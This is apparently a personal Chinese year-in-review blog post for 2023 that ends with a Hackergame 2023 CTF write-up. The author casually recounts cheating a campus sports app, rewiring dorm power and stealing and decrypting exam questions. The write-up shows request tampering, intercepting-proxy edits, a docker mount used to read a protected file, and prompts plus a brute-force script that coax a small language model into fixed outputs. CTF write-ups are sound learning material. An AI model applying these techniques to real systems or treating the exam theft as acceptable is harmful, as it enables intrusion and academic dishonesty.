学习和工作

学校

随着疫情管控的全面放开，大一下我都在线下上课。学校离家很远所以住宿，认识了新的舍友。整天窝在寝室里睡觉刷手机玩电脑，经常翘课，根本认识不到几个同学，评优什么的跟自己毫无关系，从来不去图书馆，到了期末才开始翻书看课件运气好就少挂几门，几年里什么都没学到。大一上线上教学的期末考试放在了大一下的期初线下考试，高数挂科了（重修费好贵，我上课又不听，能不能不付钱（x））我还是喜欢线上上课考试。感觉早八好困难，不知道我高中是怎么活过来的（x

让我看看大一学生都在学些啥？高等数学，线性代数，思政，近代史，金工，英语，体育，军事理论，军事技能，大学物理，机械制图，心理健康，生涯规划。还有我们亲爱的计算机相关课程：C 语言。 使用 VC6 的 C 语言，变量声明位置换一换就不工作了，我除了考试都自带笔记本用自己环境，没有 OJ，作业代码要打印在纸上，无语了。

金工实习还安排在周末（流汗黄豆）

体育课有校园跑要求，对高校体育 APP 抓包作弊把号玩没了（）

学校宿舍晚上会熄灯，除了空调线路不断电，插座会断电，晚上会没电没网。我第一次尝试改接强电线路并成功了，宿管也没查出来。

我加入了学校的动漫社、网络安全社团、电子设计竞赛实验室、日语角，并尝试在学校组建 Linux 用户组。

和学校网络安全社团的同学组队参加了两次市级或赛区级 CTF 比赛，拿了两个二等奖。第一次拿奖金 & 第一次吃茶歇（x

在电子设计竞赛实验室的培训作业中略微学习了一些 STM32 的皮毛。我自学了 KiCAD，贡献了一些中文翻译。实验室主要使用嘉立创 EDA，我在 AUR 维护了一年有余，也很高兴能看到 @taotieren 在今年将其加入 archlinuxcn 软件源中。

在机械制图课程的启发下学了一些 FreeCAD。相较我以前用的 Fusion360 它免费开源更流畅，特色是通过限定条件来建模，工作流清晰，开源拖拉机，界面略丑，偶尔崩溃。需要在建模前有大致想法，如果对前几步的某个参数调整了有可能后续的步骤都需要重做。不支持两个及以上实体。

写了一些和学校有关的匿名开源脚本。学校的 Linux 用户组从泰晓拿到了 Milk-V Duo，第一次接触到了 RISC-V，不是很会玩，尝试 swap 个 archlinux 上去失败了，看到了 @Blockcity 的点灯，比我玩的成功。

大二换了校区和宿舍分配，由于离家较近我决定走读，还是家里舒服。

考试

在我的 2022 提到了我参加 CET 4 和 JLPT N2 的考试，在今年出了成绩。

• CET 4：525/710（听力 200 + 阅读 176 + 写作和翻译 149）
• JLPT N2：180/180 意料之外，早知道就直接考 N1 了（余额-550）

在 2023 年，我参加了 CET 6 和 JLPT N1 的考试。

• CET 6：445/710（听力 146 + 阅读 174 + 写作和翻译 125） 好险，勉强合格，英语是废了
• JLPT N1：127/180（语言知识 35 + 阅读 43 + 听力 49）（余额-550）
  我觉得是偏低了（不过我也没学什么（）），JLPT 没有考察到的写作和口语还是很菜。

我还参加了上海市高等学校信息技术水平考试（SCITE），我选择的科目是四级网络与信息安全，96/100，考了没什么用，机考，我把考试题偷出来并使用 Access PassView 解密了 （什么叫网络与信息安全啊） ，没有正确答案，有兴趣的话可以下载查看（题目附件报毒，不过全是 asp php 之类的文件，没有可执行二进制文件，问题不大）。

我在暑假学习了小型汽车的驾驶，尽管驾校的教学质量并不好，我拿到了 C1 机动车驾驶证。虽然只是勉强会开（）

线上

• 参加了 Hackergame 2023，总排名没有去年好，有点摆烂。
• 尝试了更换桌面操作系统为 NixOS，没有成功。我觉得它的理念是好的，但是文档（考虑到配置方法与大部分发行版不同）和大多数人在用的实验性功能（flake、home manager…）还需要再完善一段时间，也许我明年会再尝试一次？非官方文档里我觉得 ryan4yin 的教程比较好用，官方文档我觉得太抽象了，不是像 Arch Wiki 那样的手把手教学。
• 为 NixOS/nixpkgs 添加了一些包，目标是完成 NixOS for Pentesting，如果我再尝试 NixOS 的话会再看看有没有我能打的新包。
• 全年继续使用我最爱的 Linux 发行版 Arch Linux。我维护的 AUR 包数量从去年的 16 个增长到 41 个，其中 mastodon-twitter-sync 和 python-pem （相关 bug） 被收录进了官方源。
• 创建了我自己的 Arch Linux 软件源（谢谢 @Clansty）。
• 参与了 DIYgod/RSSHub RSS 路由的开发，谢谢 @TonyRL 每次 review 时的悉心指导。
• 第一次实现了 GitHub 每周全勤（虽然不知道在忙什么（x））

AOSCC

暑假的时候家人计划去旅游，日程与 AOSCC 2023 冲突，我选择了去参加 AOSCC，同时也拿到了旅游经费用来搭建我的 HomeLab。

我与大学刚组建不久的 LUG 的同学一起参加了 AOSCC，这是我第一次参加线下聚会。

meetup

谢谢 @Blockcity 的邀请，借 @Blockcity 同时 meetup 了 @Cronfox 和 @Horo。

还 meetup 了 @Camber、@Ciel、@Milkice、@MiaoTony，谢谢你们关注到我。

Key Signing Party

参加了 AOSCC 2023 Key Signing Party，谢谢以下 PGP 使用者为我签名。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

$ gpg --fingerprint --with-subkey-fingerprint --list-signatures 293B93D8A471059F85D716A65BA92099D9BE2DAA | sed -e 's/@/ at /g' -e 's/\./ dot /g'
pub   ed25519 2023-01-01 [SC] [expires: 2030-01-01]
      293B 93D8 A471 059F 85D7  16A6 5BA9 2099 D9BE 2DAA
uid           [ultimate] Misaka13514 <Misaka13514 at gmail dot com>
sig 3        5BA92099D9BE2DAA 2023-01-01  [self-signature]
sig 3        189BB387CF3AD95F 2023-01-01  欠陥電気RadioNoise (御坂13514号のECC鍵) <Misaka13514 at gmail dot com>
sig          3A1F06DFCA34ECE5 2023-07-17  CharlieYu4994 <charlieyu4994 at lassi-cat dot cn>
sig          BF2CA8CDB1722943 2023-07-17  Canarypwn (Canarypwn) <canarypwn at aosc dot io>
sig 1        6F4C5AF537D3C301 2023-07-17  Mike Yuan (YHNdnzj) <me at yhndnzj dot com>
sig          C111949073FC0F67 2023-07-17  Jiaxun Yang <jiaxun dot yang at flygoat dot com>
sig 2        15F4180E73787863 2023-07-18  Coelacanthus <CoelacanthusHex at gmail dot com>
sig 2        BFF89D4FFF7FAD1C 2023-07-20  Xinhui Yang <cyan at cyano dot uk>
sig 2        020921FE312A15B1 2023-07-20  MiaoTony (MiaoTony's Outlook) <miaotony at outlook dot com>
sig 3        12FC7165238A4CB1 2023-07-23  柏园猫猫 <i at nekomoe dot xyz>
sig 1        530163CFEC309530 2023-07-23  liang yongxiang <tanekliang at gmail dot com>
uid           [ultimate] Misaka_0x34ca <admin at atri dot tk>
sig 3        5BA92099D9BE2DAA 2023-01-01  [self-signature]
sig 3        189BB387CF3AD95F 2023-01-01  欠陥電気RadioNoise (御坂13514号のECC鍵) <Misaka13514 at gmail dot com>
sig          3A1F06DFCA34ECE5 2023-07-17  CharlieYu4994 <charlieyu4994 at lassi-cat dot cn>
sig          BF2CA8CDB1722943 2023-07-17  Canarypwn (Canarypwn) <canarypwn at aosc dot io>
sig 1        6F4C5AF537D3C301 2023-07-17  Mike Yuan (YHNdnzj) <me at yhndnzj dot com>
sig          C111949073FC0F67 2023-07-17  Jiaxun Yang <jiaxun dot yang at flygoat dot com>
sig 2        15F4180E73787863 2023-07-18  Coelacanthus <CoelacanthusHex at gmail dot com>
sig 2        BFF89D4FFF7FAD1C 2023-07-20  Xinhui Yang <cyan at cyano dot uk>
sig 2        020921FE312A15B1 2023-07-20  MiaoTony (MiaoTony's Outlook) <miaotony at outlook dot com>
sig 3        12FC7165238A4CB1 2023-07-23  柏园猫猫 <i at nekomoe dot xyz>
sig 1        530163CFEC309530 2023-07-23  liang yongxiang <tanekliang at gmail dot com>
sub   cv25519 2023-01-01 [E] [expires: 2030-01-01]
      60B8 CFF2 C1E8 2F6B 2627  A1D7 6B71 F8EC 272C FDCF
sig          5BA92099D9BE2DAA 2023-01-01  [self-signature]
sub   ed25519 2023-01-01 [A] [expires: 2030-01-01]
      64EB C7BB 5FCB 344C 088D  8E11 FB30 5A67 8861 3226
sig          5BA92099D9BE2DAA 2023-01-01  [self-signature]
sub   ed25519 2023-01-01 [S] [expires: 2030-01-01]
      D633 F658 4ECB 7AD7 6216  6144 B4F6 D57F 0FC9 507E
sig          5BA92099D9BE2DAA 2023-01-01  [self-signature]

我写了一个程序绘制有向图用来可视化这次 Signing Party 参与者的信任关系。在第一张图中 sig0 和 sig1 不显示。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139

import subprocess
import networkx as nx
import matplotlib.pyplot as plt
import numpy as np
from PIL import Image


# 执行GnuPG命令并获取输出
def run_gpg_command(args):
    return subprocess.check_output(['gpg'] + args, text=True)


# 读取GnuPG密钥环
gpg_output = run_gpg_command([
    '--homedir', '~/AOSCC-Sign/gpg/', '--list-signatures',
    '--with-colons'
])
gpg_data = gpg_output.strip().split('\n')

# 创建有向图
graph = nx.MultiDiGraph()

key_id = None
# 解析信任网络并添加边
for line in gpg_data:
    if "User ID not found" in line:
        continue

    parts = line.split(':')
    record_type = parts[0]

    if record_type == 'pub':
        key_id = parts[4]
        graph.add_node(key_id)  # 添加节点（GnuPG密钥）
    elif record_type == 'sig':
        signer_key_id = parts[4]
        if signer_key_id != key_id:
            if not graph.has_edge(signer_key_id, key_id):
                trust_level = int(parts[10][1])
                if trust_level < 2:
                    continue
                graph.add_edge(signer_key_id, key_id,
                               trust_level=trust_level)  # 添加边（签名关系）
                print(f"{signer_key_id} -> {key_id} ({trust_level})")

# 去除孤立节点
graph.remove_nodes_from(list(nx.isolates(graph)))

# 设置节点的图标并在节点下方标注节点ID
avatars_directory = "avatars/"

for node_id in graph.nodes:
    avatar_path = avatars_directory + f"{node_id}.jpg"
    avatar_image = Image.open(avatar_path)

    graph.nodes[node_id]["image"] = avatar_image  # 设置节点图标
    graph.nodes[node_id]["label"] = node_id  # 在节点下方标注节点ID

# 使用Kamada-Kawai布局设置节点位置
pos = nx.kamada_kawai_layout(graph)


# 添加微小的随机偏移，以避免节点图标的重叠
def add_random_noise(pos, scale=0.01):
    noisy_pos = {}
    for node, (x, y) in pos.items():
        noise_x = np.random.uniform(-scale, scale)
        noise_y = np.random.uniform(-scale, scale)
        noisy_pos[node] = (x + noise_x, y + noise_y)
    return noisy_pos


# 判断节点图标是否重叠
def has_overlapping_labels(pos, labels, threshold=0.03):
    for u, p1 in pos.items():
        for v, p2 in pos.items():
            if u != v and np.linalg.norm(np.array(p1) -
                                         np.array(p2)) < threshold:
                if labels[u] != labels[v]:
                    return True
    return False


# 迭代调整节点位置，直到没有图标重叠
iteration = 0
while has_overlapping_labels(pos, graph.nodes()):
    pos = add_random_noise(pos, scale=0.02)  # 调整的幅度可以根据实际情况调整
    iteration += 1

    if iteration >= 100:
        print("无法消除图标重叠，退出迭代。")
        break

# 提升图片分辨率
plt.figure(figsize=(16, 16), dpi=300)

# 绘制节点图标
for node, (x, y) in pos.items():
    image = graph.nodes[node]["image"]
    delta = 0.05
    plt.imshow(image, extent=[x - delta, x + delta, y - delta, y + delta])

# 绘制节点ID
node_labels = {node: node for node in graph.nodes}

# 设置节点标签的位置偏移量，以避免标签与节点图标重叠
label_pos = {node: (x, y - 0.08) for node, (x, y) in pos.items()}

# 根据trust_level选择边的颜色
edge_colors = dict(zip(list(range(4)), ['lightgray', 'gray', 'darkgray', 'black']))

for u, v, data in graph.edges(data=True):
    trust_level = data['trust_level']
    edge_color = edge_colors.get(trust_level, 'gray')

    # 绘制曲线边，通过设置connectionstyle参数来实现
    connection_style = f"arc3,rad=0.2"
    # 设置线条粗细为1.0
    nx.draw_networkx_edges(graph,
                           pos,
                           edgelist=[(u, v)],
                           edge_color=edge_color,
                           width=1,
                           alpha=0.7,
                           arrowsize=15,
                           connectionstyle=connection_style)

# 使用offset_text来避免标签在边缘被截断
for node, label in node_labels.items():
    x, y = label_pos[node]
    plt.text(x, y, label, fontsize=10, ha='center', va='center', zorder=10)

# 调整绘图区域大小，添加边距以防止标签在边缘被截断
plt.xlim(-1.1, 1.1)
plt.ylim(-1.1, 1.1)

plt.axis('off')
plt.savefig('gpg-graph.png', bbox_inches='tight', pad_inches=0, dpi=300)
plt.show()

stickers

拿到了 AOSCC、JLU、SHLUG 发放的贴纸和买菜兜。

今年拿到的一些其它东西

YubiKey

收到了 Cloudflare Yubikey 打折活动时与群友拼车购买的 YubiKey。谢谢 @Edison，帮助我从韩国低价转运 YubiKey，还送了小零食和明信片，爱了。

今年我更换了新的 PGP 密钥，并开始使用 YubiKey，在这一年里，我使用 YubiKey 创建了多达 578 个 PGP 签名。今年和 @baiyuanneko 互签了 sig3。

Hacktoberfest 2022

收到了 Hacktoberfest 2022 赠送的 T 恤和贴纸。虽然今年的活动不送实体奖品了，但我仍然参加了。

CMU 问卷

有一天邮箱里多了个 CMU 发的问卷，看着不像钓鱼就填了，然后 win 了 1 of 4 $100 Amazon gift cards，也许是全年唯一的 lucky moment？总之谢谢 CMU 了。我把它用在买 SAMSUNG 980 PRO 2TB 上了，这下笔记本的最后一片也完整了，原来的旧硬盘给我的 HomeLab 用了。

@baiyuanneko 的礼物

是我平时不舍得买的一些二次元周边，但是收到会很开心，谢谢 @baiyuanneko。

@novule 的礼物

同笔记本型号 Linux 用户，帮忙买了个编程器提取了个 BIOS 救砖，收到了 ¥100 的京东卡，谢谢你在这个机器的使用（折腾）上带领着我。

ACGN

今年看了很多番，就不一一点评了，使用 aisuneko/AnimeTierList 生成了一张我的评分等级图，谢谢 @aisuneko。

今年开始尝试与香子兰群友使用 syncplay 同步看番，谢谢 @baiyuanneko 和 @scientificworld，很喜欢实时聊天。

对不起香子兰群友，我要退游了。感觉 Minecraft 越来越没意思，玩来玩去也就那么些玩法，对它的热情也慢慢消退了。最后再玩一天，今年就不玩了。

其它今年玩过的游戏有

• ふゆから、くるる。 7/10
• 天使 ☆ 騒々 RE-BOOT! 8/10
• Cyberpunk 2077 8/10

因为 Twitter 不给继续免费用 API，插画收藏受的影响比较大，没有做统计数据。

未来计划

想润日本，金币不多，专业课成绩不是很好，还没有决定继续 EE 还是转 CS，希望得到有经验的读者的指导。润其它地方也可以，就是没什么信心。

谢谢你读到这里，祝你新年快乐，明年见。

Hackergame 启动

打开题目看逻辑觉得是用声音环回 （我做过一个机器评分的英语口语作业就是这样做的） ，但是相似度只有 76.27%。看了代码发现相似度是根据波型图计算的。直接提交，发现地址栏中多了一个参数?similarity=76.27167352376027，修改为 100 后启动 Hackergame 2023。

• flag{WElcomE-t0-HAcKErG4M3-And-ENJOY-h@ck!Ng-Z0z3}

猫咪小测

1. 想要借阅世界图书出版公司出版的《A Classical Introduction To Modern Number Theory 2nd ed.》，应当前往中国科学技术大学西区图书馆的哪一层？

馆藏分布 - 中国科学技术大学图书馆，外文书库在 12 层。

2. 今年 arXiv 网站的天体物理版块上有人发表了一篇关于「可观测宇宙中的鸡的密度上限」的论文，请问论文中作者计算出的鸡密度函数的上限为 10 的多少次方每立方秒差距？（30 分）

Nuggets of Wisdom: Determining an Upper Limit on the Number Density of Chickens in the Universe，23 次方。

3. 为了支持 TCP BBR 拥塞控制算法，在编译 Linux 内核时应该配置好哪一条内核选项？

CONFIG_TCP_CONG_BBR

4. 🥒🥒🥒：「我……从没觉得写类型标注有意思过」。在一篇论文中，作者给出了能够让 Python 的类型检查器 MyPY mypy 陷入死循环的代码，并证明 Python 的类型检查和停机问题一样困难。请问这篇论文发表在今年的哪个学术会议上？（20 分）

ECOOP，没搜到，爆破的。

• flag{W3lcoMe-70-At7ENd-THe-NeK0-Ex@m-ZoZ3}
• flag{R34L-m457er-Of-7he-nEK0-eXAM-1n-US7c}

更深更暗

直接看代码，找到：

1
2
3
4
5

async function getFlag(token) {
  // Generate the flag based on user's token
  let hash = CryptoJS.SHA256(`dEEper_@nd_d@rKer_${token}`).toString();
  return `flag{T1t@n_${hash.slice(0, 32)}}`;
}

旅行照片 3.0

1、你还记得与学长见面这天是哪一天吗？（格式：yyyy-mm-dd）

中午的图 1 中左下的学长戴着 STATPHYS28，尝试 2023-08-07 ~ 2023-08-11

2023-08-10

2、在学校该展厅展示的所有同种金色奖牌的得主中，出生最晚者获奖时所在的研究所缩写是什么？

日本人のノーベル賞受賞者

与小柴昌俊（M. KOSHIBA）同展厅、东京大学

梶田隆章

ICRR

3、帐篷中活动招募志愿者时用于收集报名信息的在线问卷的编号（以字母 S 开头后接数字）是多少？

题目指出博物馆对面有喷泉，在地图上查找后：東京国立博物館、上野公園大噴水

搜索 上野公園 2023-08-10 ボランティア，找到全国梅酒まつり in 東京 2023

S495584522

4、学长购买自己的博物馆门票时，花费了多少日元？

料金・チケットのご案内写的是 500，尝试后发现不对

0

5、学长当天晚上需要在哪栋标志性建筑物的附近集合呢？（请用简体中文回答，四个汉字）

不知道，只找到可能是对应游船的運航案内。

6、进站时，你在 JR 上野站中央检票口外看到「ボタン＆カフリンクス」活动正在销售动物周边商品，该活动张贴的粉色背景海报上是什么动物（记作 A，两个汉字）？ 在出站处附近建筑的屋顶广告牌上，每小时都会顽皮出现的那只 3D 动物是什么品种？（记作 B，三个汉字）？（格式：A-B）

搜索ボタン＆カフリンクス 上野駅，找到上野駅の会場の様子，熊猫；

识别马里奥世界照片，结果是 Nintendo TOKYO Official Store，推断在渋谷駅出站。搜索渋谷駅 3D，找到渋谷駅近くのビルで超巨大な秋田犬が遊び回っている……！？ 巨大 3D ビジョンに注目，秋田犬。

• flag{how_I_wi5h_i_COulD_w1N_A_Nobe1_pri23_76081fe0cf}
• flag{PluM_w1NE_1S_rEa1LY_EXpen5iVE_c403ec700c}
• 第三问没对

赛博井字棋

使用截断代理，先下连成线的两步，在第三步请求发送前截断请求，修改坐标为对手已下过的位置，且使得你能连成一线。

• flag{I_can_eat_your_pieces_19e0b10842}

奶奶的睡前 flag 故事

因为之前读到过有关漏洞的新闻，结合题目的描述，知道是 aCropalypse 漏洞。一开始使用 acropalypse.app 但是可能是我打开方式不对没成功。使用 frankthetank-music/Acropalypse-Multi-Tool 成功解出 flag。

• flag{sh1nj1ru_k0k0r0_4nata-m4h0}

组委会模拟器

通过 js 看出几个 api 的调用方法，通过抓包分析了似乎只需要判断 hack[，为了避免时间漂移用了 threading.Timer。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

import requests
import threading

host = "http://202.38.93.111:10021"

def getMessages(session):
    messages = session.post(host + "/api/getMessages")
    messages = messages.json()
    return messages

def deleteMessage(session, id):
    response = session.post(host + "/api/deleteMessage", json={"id": id})
    print(response.json())

def getFlag(session):
    response = session.post(host + "/api/getflag")
    print(response.json())

with requests.Session() as session:
    session.cookies.set(
        "session",
        "<fill your cookie here>",
    )
    messages = getMessages(session)
    deleteList = []
    for i, m in enumerate(messages["messages"]):
        if "hack[" in m["text"]:
            print(i, m["text"], m["delay"])
            deleteList.append({"id": i, "delay": m["delay"]})
    for i in deleteList:
        timer = threading.Timer(i["delay"], deleteMessage, args=(session, i["id"]))
        timer.start()
    timer.join()
    getFlag(session)

• flag{Web_pr0gra_mm1ng_9c917fb7f6_15fun}

虫

一听就是 SSTV （玩无线电玩的） ，直接解码。Signal Identification Guide

• flag{SSssTV_y0u_W4NNa_HaV3-4_trY}

JSON ⊂ YAML?

{"a": NaN, "a": NaN} 可以同时拿下两个 flag。

• flag{faf9facd7c9d64f74a4a746468400a507ce3e2652b}
• flag{b1c73f14d04db546b7e7e24cf1cc72521a136c3e6b}

btw 相比于 json 我更喜欢 yaml

Git? Git!

1
2
3
4
5
6
7
8
9
10

$ git reflog
ea49f0c (HEAD -> main) HEAD@{0}: commit: Trim trailing spaces
15fd0a1 (origin/main, origin/HEAD) HEAD@{1}: reset: moving to HEAD~
505e1a3 HEAD@{2}: commit: Trim trailing spaces
15fd0a1 (origin/main, origin/HEAD) HEAD@{3}: clone: from https://github.com/dair-ai/ML-Course-Notes.git
$ git checkout --force 505e1a3
HEAD is now at 505e1a3 Trim trailing spaces
$ grep -R flag .
./.git/hooks/fsmonitor-watchman.sample:# return the fast "everything is dirty" flag to git and do the
./README.md:  <!-- flag{TheRe5_@lwAy5_a_R3GreT_pi1l_1n_G1t} -->

• flag{TheRe5_@lwAy5_a_R3GreT_pi1l_1n_G1t}

HTTP 集邮册

只收集到了 10 个状态码：[100, 200, 206, 304, 400, 404, 405, 414, 416, 505]

无状态码把首行改成GET /\r\n。

• flag{stacking_up_http_status_codes_is_fun_97ad87477e}
• flag{great backward compatibility of nginx, R1ght?}

Docker for Everyone

原来是打算用 --privileged 加挂载写入提权，但是都只读，cron 也没有。

1
2
3
4
5

alpine:~$ ls -l /flag
lrwxrwxrwx    1 root     root            13 Oct  8 12:10 /flag -> /dev/shm/flag
alpine:~$ docker run -it --rm -v /dev/shm/flag:/flag alpine
/ # cat /flag
flag{u5e_r00t1ess_conta1ner_7d2661333c_plz!}

• flag{u5e_r00t1ess_conta1ner_7d2661333c_plz!}

惜字如金 2.0

先把代码手动还原一些，发现只有 code_dict 还原有多种情况，使用 python 代码暴力破解：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78

import itertools

code_dicts = [
    "nymeh1niwemflcir}echaet",
    "a3g7}kidgojernoetlsup?h",
    "ulw!f5soadrhwnrsnstnoeq",
    "ct{l-findiehaai{oveatas",
    "ty9kxborszstguyd?!blm-p",
]

def split_string(s: str) -> list[str]:
    result = []
    current = ""
    for c in s:
        if c.isalpha():
            current += c
        else:
            if current:
                result.append(current)
                current = ""
            result.append(c)
    if current:
        result.append(current)
    return result

def expand_consonants(s: str) -> list[str]:
    vowels = set("aeiou")
    result = []
    for i, c in enumerate(s):
        if c not in vowels:
            new_s = s[: i + 1] + c + s[i + 1 :]
            result.append(new_s)
    if not s.endswith("e"):
        result.append(s + "e")
    return result

def is_alpha(s: str) -> bool:
    for c in s:
        if not c.isalpha():
            return False
    return True

def expand_code_dict(code_dict: str) -> list:
    splits = split_string(code_dict)
    expanded_code_dicts = []
    for i, s in enumerate(splits):
        if is_alpha(s):
            for expanded in expand_consonants(s):
                expanded_code_dicts.append(
                    "".join(splits[:i] + [expanded] + splits[i + 1:])
                )
    return expanded_code_dicts

all_expanded_code_dicts = [expand_code_dict(code_dict) for code_dict in code_dicts]
iterated_code_dicts = itertools.product(*all_expanded_code_dicts)

def decrypt_data(input_codes, code_dict):
    output_chars = [code_dict[c] for c in input_codes]
    return "".join(output_chars)


def iterate_code_dict():
    for code_dicts in iterated_code_dicts:
        yield code_dicts


for code_dict in iterated_code_dicts:
    code_dict = "".join(code_dict)
    flag = decrypt_data(
        [53, 41, 85, 109, 75, 1, 33, 48, 77, 90,
        17, 118, 36, 25, 13, 89, 90, 3, 63, 25,
        31, 77, 27, 60, 3, 118, 24, 62, 54, 61,
        25, 63, 77, 36, 5, 32, 60, 67, 113, 28],
        code_dict,
    )
    if flag.startswith("flag{") and flag.endswith("}"):
        print(flag)
        # exit(0)

• flag{you-ve-r3cover3d-7he-an5w3r-r1ght?}

🪐 高频率星球

asciinema cat asciinema_restore.rec > asciinema_restore.js 然后打开这个 js 把控制字符手动删一删，hash 不用一致运行也能得到 flag。

• flag{y0u_cAn_ReSTorE_C0de_fr0m_asc11nema_3db2da1063300e5dabf826e40ffd016101458df23a371}

🪐 小型大语言模型星球

You Are Smart

payload She says "You are smart. Am I smart?". He replies "

• flag{i-7H1nk-YOu-AR3-r34!Ly-RE@11Y-$m@RT}

Accepted

题目提示消息长度不超过 7，就爆破试试：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48

import itertools
import string
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
model = AutoModelForCausalLM.from_pretrained("./TinyStories-33M").eval()
tokenizer = AutoTokenizer.from_pretrained("./TinyStories-33M")
model.to(device)

def check_response(message, response, token):
    response = response.strip().lower()
    info = ""
    flag1, flag2, flag3, flag4 = "flag1", "flag2", "flag3", "flag4"
    if "you are smart" in response:
        info += f"\n👏👏👏 flag1: `{flag1}` 👏👏👏"
    if len(message) <= 7 and "accepted" in response:
        info += f"\n🎉🎉🎉 flag2: `{flag2}` 🎉🎉🎉"
    if len(message) <= 100 and "hackergame" in response:
        info += f"\n🎊🎊🎊 flag3: `{flag3}` 🎊🎊🎊"
    if len(message) <= 200 and "🐮" in response:
        info += f"\n🔥🔥🔥 flag4: `{flag4}` 🔥🔥🔥"
    return info

def predict(message):
    model_inputs = tokenizer.encode(message, return_tensors="pt")
    model_inputs = model_inputs.to(device)
    model_outputs = model.generate(
        model_inputs,
        max_new_tokens=30,
        num_beams=1,
        pad_token_id=tokenizer.eos_token_id,
    )
    model_outputs = model_outputs[0, len(model_inputs[0]) :]
    model_output_text = tokenizer.decode(model_outputs, skip_special_tokens=True)
    return model_output_text

alphabet = string.ascii_lowercase + string.digits

for length in range(1, 8):
    for candidate in itertools.product(alphabet, repeat=length):
        message = "".join(candidate)
        model_output_text = predict(message)
        print(message, model_output_text)
        if "accepted" in model_output_text:
            info = check_response(message, model_output_text, "")
            print(message, model_output_text, info)
            input()

payload dju

• flag{yOU-4r3-aCC3Pt3d-7O-C0N71nuE-7HE-gaMe}

🪐 流式星球

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55

import cv2
import numpy as np


def create_video(file, output):
    vidcap = cv2.VideoCapture(file)
    frame_count = int(vidcap.get(cv2.CAP_PROP_FRAME_COUNT))
    frame_width = int(vidcap.get(cv2.CAP_PROP_FRAME_WIDTH))
    frame_height = int(vidcap.get(cv2.CAP_PROP_FRAME_HEIGHT))

    buffer = np.empty(shape=(frame_count, frame_height, frame_width, 3), dtype=np.uint8)

    for i in range(frame_count):
        success, frame = vidcap.read()
        if not success:
            raise Exception(f"Failed to read frame {i}")
        buffer[i] = frame

    buffer = buffer.reshape((frame_count * frame_height * frame_width, 3))
    buffer = buffer.ravel()
    # buffer = buffer[: -random.randint(0, 100)]
    buffer.tofile(output)


def restore_video(file, output, frame_count, frame_width, frame_height):
    frame_rate = 30
    codec = "mp4v"

    # Read the binary file as a numpy array
    buffer = np.fromfile(file, dtype=np.uint8)

    # drop the last few bytes
    buffer = buffer[: (3 * frame_count * frame_width * frame_height)]

    # Reshape the array to the original shape of the video frames
    buffer = buffer.reshape((frame_count, frame_height, frame_width, 3))

    # Create a video writer object with the same properties as the original video
    vidwriter = cv2.VideoWriter(
        output, cv2.VideoWriter_fourcc(*codec), frame_rate, (frame_width, frame_height)
    )

    # Write each frame to the output video file
    for i in range(frame_count):
        vidwriter.write(buffer[i])

    # Release the video writer object
    vidwriter.release()


if __name__ == "__main__":
    frame_width = 427
    frame_height = 439
    frame_count = int(135146688 / (frame_width * frame_height * 3))
    restore_video("video.bin", "video.mp4", frame_count, frame_width, frame_height)

可惜末尾被随机丢了一部分，否则可以分解因数算出长宽

• flag{it-could-be-easy-to-restore-video-with-haruhikage-even-without-meta-data-0F7968CC}

🪐 低带宽星球

我最好的两个结果，一个是 compress-or-die 压缩的 webp，178 字节；另一个是我自己试的 svg，156 字节：

1
2
3
4
5

<svg>
  <rect width="1024" height="1024" fill="#547b9b"/>
  <rect width="675" height="1024" fill="#b05ea2"/>
  <rect width="358" height="1024" fill="#ae3c09"/>
</svg>

• flag{A1ot0f_t0015_is_available_to_compre55_PNG}

异星歧途

进入游戏可以按空格暂停。

查看第一个微型处理器的逻辑：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

sensor s1 switch1 @enabled
sensor s2 switch2 @enabled
sensor s3 switch3 @enabled
sensor s4 switch4 @enabled
sensor s5 switch5 @enabled
sensor s6 switch6 @enabled
sensor s7 switch7 @enabled
sensor s8 switch8 @enabled
jump 18 equal s1 false
jump 18 equal s2 true
jump 18 equal s3 false
jump 18 equal s4 true
jump 18 equal s5 true
jump 18 equal s6 false
jump 18 equal s7 true
jump 18 equal s8 false
control enabled generator1 1 0 0 0
end
control enabled generator1 0 0 0 0
end

容易得出 10100101

查看第二个逻辑处理器的逻辑：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

sensor sw1 switch1 @enabled
sensor sw2 switch2 @enabled
sensor sw3 switch3 @enabled
sensor sw4 switch4 @enabled
sensor sw5 switch5 @enabled
sensor sw6 switch6 @enabled
sensor sw7 switch7 @enabled
sensor sw8 switch8 @enabled
op shl t sw1 7
set number t
op shl t sw2 6
op add number number t
op shl t sw3 5
op add number number t
op shl t sw4 4
op add number number t
op shl t sw5 3
op add number number t
op shl t sw6 2
op add number number t
op shl t sw7 1
op add number number t
set t sw8
op add number number t
set en 0
set i 0
jump 33 greaterThanEq i 16
op pow fl0 i 2
jump 31 notEqual fl0 number
set en 1
jump 33 always x false
op add i i 1
jump 26 always x false
op equal fl1 0 sw1
op equal fl2 0 sw6
op or fl3 fl1 fl2
jump 38 equal fl3 0
